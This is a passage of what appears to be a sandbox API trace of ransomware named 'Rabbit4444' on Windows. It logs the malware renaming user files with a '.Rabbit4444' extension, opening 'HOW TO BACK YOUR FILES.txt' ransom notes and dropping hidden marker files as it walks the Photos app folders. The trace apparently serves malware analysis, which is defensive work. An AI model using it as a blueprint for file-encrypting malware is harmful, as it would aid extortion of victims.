lpPerformanceCount=0x130bfc0*=15692409100) returned 1 [0065.613] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=131072) returned 1 [0065.613] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0065.613] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0065.614] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20300, lpName=0x0) returned 0x27c [0065.614] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x20300) returned 0x70000 [0065.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11ddb8 [0065.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0065.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ddb8 | out: hHeap=0xe0000) returned 1 [0065.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0065.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11ddb8 [0065.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0065.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ddb8 | out: hHeap=0xe0000) returned 1 [0065.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0065.630] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15694109542) returned 1 [0065.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0065.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0065.630] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.632] CloseHandle (hObject=0x27c) returned 1 [0065.632] CloseHandle (hObject=0x2cc) returned 1 [0065.632] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTracing_BGTask.last.etl.Rabbit4444") returned 132 [0065.632] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTracing_BGTask.last.etl" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\photosapptracing_bgtask.last.etl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTracing_BGTask.last.etl.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\photosapptracing_bgtask.last.etl.rabbit4444"), dwFlags=0x1) returned 1 [0065.633] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fe551b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3fe551b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xbc77712b, ftLastWriteTime.dwHighDateTime=0x1d327ce, nFileSizeHigh=0x0, nFileSizeLow=0x20000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PhotosAppTracing_BGTask.last.etl", cAlternateFileName="PHOTOS~2.ETL")) returned 0 [0065.633] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0065.633] lstrcpyW (in: lpString1=0x130ebea, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.633] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.633] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.633] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.634] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.635] CloseHandle (hObject=0x2cc) returned 1 [0065.635] CloseHandle (hObject=0x2a0) returned 1 [0065.635] GetCurrentThreadId () returned 0xd98 [0065.635] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122328 [0065.635] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile" [0065.635] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0065.635] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122320 | out: hHeap=0xe0000) returned 1 [0065.635] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile" [0065.635] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile\\" [0065.635] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile\\.BFC0E91B00AE8A0620D3" [0065.635] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\photosapptile\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.643] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.646] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.647] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.647] CloseHandle (hObject=0x2a0) returned 1 [0065.647] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile") returned 102 [0065.647] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.647] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32922ee1, ftCreationTime.dwHighDateTime=0x1d32756, ftLastAccessTime.dwLowDateTime=0xd0ee01ba, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf073896c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0065.648] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.648] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.648] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.648] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.648] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32922ee1, ftCreationTime.dwHighDateTime=0x1d32756, ftLastAccessTime.dwLowDateTime=0xd0ee01ba, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf073896c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.648] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.648] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.648] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.648] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.648] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.648] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf073896c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf073896c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf073896c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.648] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.648] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.648] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf073896c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf073896c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf073896c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.648] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0065.648] lstrcpyW (in: lpString1=0x130ec06, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.648] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\photosapptile\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.649] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.649] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.649] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.650] CloseHandle (hObject=0x2cc) returned 1 [0065.650] CloseHandle (hObject=0x2a0) returned 1 [0065.650] GetCurrentThreadId () returned 0xd98 [0065.650] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122108 [0065.650] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache" [0065.650] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122f00 | out: hHeap=0xe0000) returned 1 [0065.650] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122100 | out: hHeap=0xe0000) returned 1 [0065.650] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache" [0065.650] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache\\" [0065.650] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" [0065.650] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.651] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.653] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.654] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.655] CloseHandle (hObject=0x2a0) returned 1 [0065.655] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache") returned 88 [0065.655] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.655] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fd05db4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0e919b3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf073896c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0065.655] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.655] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.655] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.655] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.655] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fd05db4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0e919b3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf073896c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.655] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.655] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.655] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.655] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.656] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.656] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf073896c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf073896c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf073896c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.656] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.656] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.656] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf073896c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf073896c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf073896c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.656] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0065.656] lstrcpyW (in: lpString1=0x130ebea, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.656] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.656] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.656] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.657] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.657] CloseHandle (hObject=0x2cc) returned 1 [0065.657] CloseHandle (hObject=0x2a0) returned 1 [0065.657] GetCurrentThreadId () returned 0xd98 [0065.657] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122188 [0065.657] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData" [0065.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123eb8 | out: hHeap=0xe0000) returned 1 [0065.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122180 | out: hHeap=0xe0000) returned 1 [0065.657] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData" [0065.657] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData\\" [0065.657] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" [0065.657] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.658] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.661] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.661] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.662] CloseHandle (hObject=0x2a0) returned 1 [0065.662] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData") returned 85 [0065.662] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.662] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fd05db4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0e912c2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf075ebc0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0065.662] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.662] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.662] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.662] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.662] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fd05db4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0e912c2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf075ebc0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.663] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.663] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.663] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.663] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.663] lstrcmpiW 